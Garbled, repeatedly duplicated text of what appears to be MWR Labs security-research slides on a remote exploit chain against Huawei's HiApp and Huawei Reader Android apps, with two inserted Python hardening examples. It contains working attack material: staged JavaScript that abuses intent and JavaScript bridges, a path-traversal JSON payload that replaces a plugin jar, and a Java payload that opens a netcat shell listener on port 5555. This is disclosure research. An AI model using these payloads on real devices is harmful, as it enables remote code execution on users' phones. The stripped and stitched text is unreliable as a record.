FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java
android-app://package_id[/scheme[/host[/path]]][#Intent;...;end]
android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end
Action: com.example.MY_ACTION
Package: com.example.app
Extras: some_int=(int)100, some_str=(String)hello
HiApp – stage2.html (CVE-2018-7932)
37
var pkg = "com.huawei.hwireader";
var uri = "android-app://http://www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAILS;url=http://192.168.137.1:8000/stage3.html;end";
window.HiSpaceObject.launchApp(pkg, uri);
Stage 2 (chain diagram): Browse to Website on Device -> BROWSABLE Intent -> WebView -> Exported Intent -> WebView -> Code Exec and Profit
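Slides 35 to 37 hinge on what Intent.parseUri() will build from a string the page controls. The following is an added example (Python written for this page, not Android's or HiApp's code): a parser for the subset of the android-app:// and #Intent;...;end syntax shown on slide 36, followed by the kind of policy a bridge method like launchApp() could apply before calling startActivity(). The policy, the allowlisted package set, the activity name com.example.InternalWebActivity and the 198.51.100.7 address are all constructed for the example.

```python
"""Parser for the android-app:// / #Intent;...;end URI syntax plus a bridge launch policy."""
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional

# Typed-extra prefixes from the Intent URI syntax (S. string, i. int, l. long,
# B. boolean, f. float, d. double)
_EXTRA_TYPES = {
    "S.": str,
    "i.": int,
    "l.": int,
    "B.": lambda v: v == "true",
    "f.": float,
    "d.": float,
}
_PLAIN_KEYS = ("action", "package", "component", "scheme", "type", "launchFlags")


@dataclass
class ParsedIntent:
    package: Optional[str] = None
    action: Optional[str] = None
    component: Optional[str] = None
    categories: List[str] = field(default_factory=list)
    extras: Dict[str, Any] = field(default_factory=dict)
    other: Dict[str, str] = field(default_factory=dict)


def parse_intent_uri(uri: str) -> ParsedIntent:
    """Parse the subset of Intent URI syntax shown on the slides.

    Like Intent.parseUri(): for android-app:// the first path segment is the
    package id; the '#Intent;' fragment is a ';'-separated key=value list
    terminated by 'end'. Elements with an unknown extra prefix are rejected."""
    intent = ParsedIntent()
    head, sep, frag = uri.partition("#Intent;")
    if head.startswith("android-app://"):
        intent.package = head[len("android-app://"):].split("/", 1)[0] or None
    if not sep:
        return intent
    if not frag.endswith("end"):
        raise ValueError("Intent fragment not terminated by 'end'")
    for item in frag[: -len("end")].split(";"):
        if not item:
            continue
        key, eq, value = item.partition("=")
        if not eq:
            raise ValueError(f"malformed element {item!r}")
        if key == "category":
            intent.categories.append(value)
        elif key in _PLAIN_KEYS:
            if key in ("action", "package", "component"):
                setattr(intent, key, value)
            else:
                intent.other[key] = value
        elif key[:2] in _EXTRA_TYPES:
            intent.extras[key[2:]] = _EXTRA_TYPES[key[:2]](value)
        else:
            raise ValueError(f"unknown extra type in {item!r}")
    return intent


# Constructed policy for this example; the bridge on the slides applies no such check.
ALLOWED_ACTIONS = {"android.intent.action.VIEW", "android.intent.action.MAIN"}


def bridge_launch_allowed(intent: ParsedIntent, allowed_packages) -> bool:
    """Policy a JavaScript bridge could apply before startActivity(): no explicit
    component (otherwise the page picks any exported activity of the target,
    extras included), only allowlisted packages, only implicit VIEW/MAIN actions."""
    if intent.component is not None:
        return False
    if intent.package not in allowed_packages:
        return False
    return intent.action is None or intent.action in ALLOWED_ACTIONS
```

The component check is the one that matters for this chain: slide 37 relies on the bridge passing a component= element straight through, which turns a "launch an app" helper into "start any exported activity of that app with extras of my choosing".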
Huawei Reader Application
39
Huawei Reader – Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8) {
    CharSequence v0_1;
    String v0;
    CharSequence v1 = null;
    super.onCreate(arg8);
    Intent v2 = this.getIntent();
    if(v2 != null) {
        Uri v3 = v2.getData();
        if(v3 != null) {
            v0 = v3.getScheme();
            // ...
        }
        else {
            v0_1 = v1;
        }
        // ...
        v0 = v2.getStringExtra("url");
        if(TextUtils.isEmpty(((CharSequence)v0))) {
            goto label_51;
        }
        this.loadRefreshUrl(v0);
        // ...
Huawei Reader – Input Validation (CVE-2017-15308)
41
@JavascriptInterface public void do_command(String arg9) {
    // ...
    String v4 = ((JSONObject)v2_3).getString("Action");
    LOG.I("js actionName: " + v4);
    JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
    if(v4.equalsIgnoreCase("onlineReader")) {
        JSProtocol.mJSBookProtocol.online(v5);
        return;
    }
    if(v4.equalsIgnoreCase("readNow")) {
        JSProtocol.mJSBookProtocol.readNow(v5);
        return;
    }
    // ...
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
    // ...
    v8 = 0;
    v10 = v4;
    v4_1 = 0;
    try {
        int v13 = v7.getInt("Type");
        v14 = v7.optInt("Version");
        v15 = v7.optBoolean("getDrmAuth", true);
        v3 = PATH.getBookDir() + v7.getString("FileName");
        v2 = v7.getInt("FileId");
        v6 = v7.getString("DownloadUrl");
        // ...
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
43
function download_plugin() {
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
        '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"../plugins/DFService/classes.jar",' +
        '"FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip",' +
        '"DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Stage 3 (chain diagram): Browse to Website on Device -> BROWSABLE Intent -> WebView -> Exported Intent -> WebView -> File Write -> Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10) {
    boolean v0_2;
    try {
        int v3 = arg10.getInt("StartIndex");
        int v4 = arg10.getInt("EndIndex");
        String v2 = arg10.getString("Price");
        int v1 = arg10.getInt("BookId");
        String v5 = arg10.getString("PayURL");
        String v0_1 = arg10.getString("DownloadURL");
        String v7 = PATH.getBookDir() + arg10.getString("FileName");
        if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && DEVICE.getNetType() != 0xFFFFFFFF) {
            FILE.delete(PATH.getBookCachePathNamePostfix(v7));
            FILE.delete(v7);
            // ...
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2) {
    return PATH.getOpenFailDir() + MD5.getMD5(arg2);
}
public static String getOpenFailDir() {
    return PATH.getWorkDir() + "books/openfail/";
}
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 = "../plugins/DFService/classes.jar"
/sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
/sdcard/HWiReader/books/../plugins/DFService/classes.jar
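Slides 42/43 and 45/47 share one root cause: PATH.getBookDir() + FileName with a FileName that the page controls, so both the download target and the delete target can be steered out of the books directory, and the openfail marker that gates the delete is itself at a predictable path derived from the same string. As an added example (Python written for this page, not the reader app's code), the block below puts the concatenation pattern beside a hardened join that normalises the name and refuses anything that leaves the book directory. The directory constants follow the layout on slide 47; the sample names are constructed, and the MD5 marker helper is only shown to make the derivation of the openfail path visible, not to reproduce the slide's hash value.

```python
"""Book-path construction: the concatenation pattern from the slides beside a hardened join."""
import hashlib
import posixpath

# Directory layout as shown on slide 47 (constants constructed for this example)
WORK_DIR = "/sdcard/HWiReader/"
BOOK_DIR = WORK_DIR + "books/"
OPENFAIL_DIR = WORK_DIR + "books/openfail/"


def book_path_unchecked(file_name: str) -> str:
    """The pattern from the slides: PATH.getBookDir() + FileName, no validation."""
    return BOOK_DIR + file_name


def normalised_unchecked(file_name: str) -> str:
    """Where the unchecked path actually lands once '..' segments are resolved."""
    return posixpath.normpath(book_path_unchecked(file_name))


def openfail_marker_path(book_path: str) -> str:
    """Marker consulted by onChapPack(): openfail dir + MD5 of the book path.
    Anyone who can choose FileName and write a file can also place this marker."""
    return OPENFAIL_DIR + hashlib.md5(book_path.encode()).hexdigest()


def safe_book_path(file_name: str) -> str:
    """Hardened form: reject absolute names and NUL bytes, resolve '.' and '..'
    with POSIX semantics (Android paths), and require the result to stay
    strictly inside BOOK_DIR."""
    if file_name.startswith("/") or "\x00" in file_name:
        raise ValueError("absolute path or NUL byte in file name")
    base = posixpath.normpath(BOOK_DIR)
    candidate = posixpath.normpath(posixpath.join(base, file_name))
    if not candidate.startswith(base + "/"):
        raise ValueError(f"file name escapes the book directory: {file_name!r}")
    return candidate


def escapes_book_dir(file_name: str) -> bool:
    """True when safe_book_path() would reject the name."""
    try:
        safe_book_path(file_name)
    except ValueError:
        return True
    return False
```

Normalising before the prefix comparison is what makes the check hold: comparing the raw concatenated string against the book directory prefix would pass "/sdcard/HWiReader/books/../plugins/..." because it does begin with the prefix.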
Huawei Reader – Insecure Plugin Loading
48
public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
    return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
}
protected final ArrayList P() {
    if(pR == null) {
        try {
            PlatForm v3 = new PlatForm();
            Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar", "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
            v2.setPlatform(((IPlatform)v3));
            pR = ((IPlugDFService)v2);
            // ...
Huawei Reader – Insecure Plugin Loading
49
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8001/aaaaa","Price":0},' +
        '"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"../plugins/DFService/classes.jar",' +
        '"FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Huawei Reader – Payload Creation
50
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

public class DocFeature {
    public DocFeature() {
        // com.zhangyue.iReader.PlugService.DocFeature
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller -
https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website
(https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PUBLIC
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
